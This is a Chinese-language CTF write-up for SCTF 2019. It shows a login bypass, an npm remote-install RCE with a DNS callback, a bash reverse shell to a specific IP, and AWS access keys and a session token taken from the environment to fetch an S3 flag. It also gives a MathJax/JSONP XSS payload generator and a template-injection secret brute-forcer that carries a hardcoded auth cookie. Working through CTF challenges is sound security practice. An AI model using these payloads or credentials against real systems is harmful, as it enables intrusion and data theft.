2019 sctf writeup

0x00 前言

做题最多,但是wp最简略和不全的一次,:)

0x01 easy-php

https://sctf2019.l0ca1.xyz/static/js/app.51c756bc2bea67226d9b.js
先从源代码中看一下路由信息

1
2
3
/main
/login
/upload

之后发现直接访问main路由,这个登录是可以绕过的

7CB4FEEA-4CF6-4392-A959-4EB9F2814F80.png

但是有一个问题就是,如何对js进行修改,方法如下

首先在burp中设置一下
44D07737-29D7-44DE-8F9D-8DA42A080754.png

之后使用burp进行抓包并注意点击如下选项即可
BBD70930-9E38-45E5-8974-523460096D51.png

之后就可以对响应包进行修改了,把对应的requireLogin: !0修改为requireLogin: 0

之后访问到main界面

4D1E33FE-2090-4F4B-A776-94CDBCDFE3B9.png

之后查到npm支持远程安装从而可以造成rce

1
{"key":"abcdefghiklmn123","npm":["jquery","http://`whoami`.bjslfd.ceye.io/z3.git"]}

0233E12F-2439-44DF-8113-B36A22FD7706.png

71ED3664-9834-4AA5-A705-480AE1FC5BD9.png

之后直接反弹一个shell回来

1
bash -i >& /dev/tcp/47.90.204.28/2333 0>&1

AC296199-4744-4BCA-9292-C1D9CA19CE4F.png
看到aws就联想到s3的一些问题
88C2DC65-3136-496A-88F2-87D11B085355.png

从本地环境变量读取到

1
2
3
4
AWS_ACCESS_KEY_ID=ASIA5CRTL2SNLRLBSRMQ
AWS_SECRET_ACCESS_KEY=QuqbcP2cl6uAPkSDH7qSP3bSMqHk7IwKVBTUhhn2
AWS_REGION=ap-northeast-1
AWS_SESSION_TOKEN=AgoJb3JpZ2luX2VjEIP//////////wEaDmFwLW5vcnRoZWFzdC0xIkYwRAIgUSeA5K2lfCSiSffkkkEI1K/UBr3ujuppACfia/nUalkCIB30VBYpXi/F+vsDuJQzdEX0TQuq2ukNArDLkIthFaOrKokCCLz//////////wEQABoMODk4ODI5NjM2NzYyIgz3SiwxjDyJfOaEcpEq3QE3r5fc6BCD7NBqaP47fjvrlIfN6+2nJ2OL87H5HXAfoDYmubETgltb4Pald7QjvWuXhaTLO1pc7EXHb3kM5gVnkbHLfeA3VVzmLfovKNHbkdQEsXBrTuBkNkyzLzZ/IT7o4oKliK5pQ9AtlwtjUAwMDjd0EHErkAocE3nZccgFk33XCJSYELNtyE9b8wMc/OazJJ6F1Ls3hooH32SUoTpEKf/LJGDK5y5GOxdKT59nDBEGJ87xWmciQZJHIRo+uLOabvlA693RBGPz9LnEASb4+4NAIVyxUDTamNb3qTC6i7joBTq1AVZTquczQh4EvFY/P+fL03/aOq21IbAQFttGqmVwrDJNc3W8E/B6cmvaIuR0xmsfHb+/bhncSXc1VjQsPv1ZiJv16P9gCpf9Y6Xnbp7nmy7yVIvmUnK3WZJgOXS/Amsu/kUbxJT4WxR4d4r3xz1UGqmZfw+0MwDkcxtLMvMSVG5FkwvjP5W0JFG41Tp+wLfSRmN992Fa++PA0RGC55tyh9sbot8aGhnniFHXPoTq45xuMgLyzfc=

2F725AD4-4498-462D-A130-4DB4C0EC6946.png

此处token非常重要,一定要写进配置文件

1
vim /root/.aws/credentials

之后下载flag即可

1
aws s3 cp s3://static.l0ca1.xyz/flaaaaaaaaag/flaaaag.txt ./flag.txt --region ap-northeast-1

0x02 math-is-fun1

解题思路(math-is-fun2 也是这个payload,一打就通)
通过2来修改MathJax的配置,从而加载任意js文件,此时引入jsonp来实现xss。

A55D141E-1300-4393-BBFE-B0876EABDA65.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#coding:utf-8

import sys

def getPayload(evaljs):
	p = "http://47.110.128.101/config?callback="
	payload='eval(String.fromCharCode('
	for i in range(len(evaljs)):
		payload+=str(ord(evaljs[i]))
		if(i+1<len(evaljs)):
			payload+=','
	payload+='));//'
	payload+=""
	test = "http://47.110.128.101/challenge?name=abcd%0aMathJax[%27root%27]%3d"
	payload = test+p+payload+"%26/"
	print("[payload] "+payload)
	return 



if __name__ == '__main__':
	arg = sys.argv[2]
	getPayload(arg)

0x03 Flag Shop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests

url = "http://47.110.15.101/work?name=%3C%25%3d$%26%25%3E&do=%3C%25%3d$%26%25%3E+is+working&SECRET={SECRET}"

SECRET ="ec55ce17b51f7f2588b3d2f09c821e6499984b09810e652ce9fa4882fe4875c8"


headers = {
	"Cookie": "auth=eyJhbGciOiJIUzI1NiJ9.eyJ1aWQiOiJhMDc4ZDU3ZC0wZjZmLTRhNTItODE1MC0yMGYyOTkzYzkxMTUiLCJqa2wiOjI4fQ.gQnZDaa3pKpldiD07vWsX65SO4Ioz5ZawOy5xJPNSEU;"
}

zidian="1234567890qwertyuiopasdfghjklzxcvbnm"
for jj in range(30):
	for i in zidian:
		test = SECRET + i
		# test = i + SECRET
		crackUrl = url.replace("{SECRET}",test)
		text = requests.get(crackUrl,headers=headers).text
		if("'"+test+" " in text):
			SECRET = test
			print("[SECRET] " + SECRET)
			break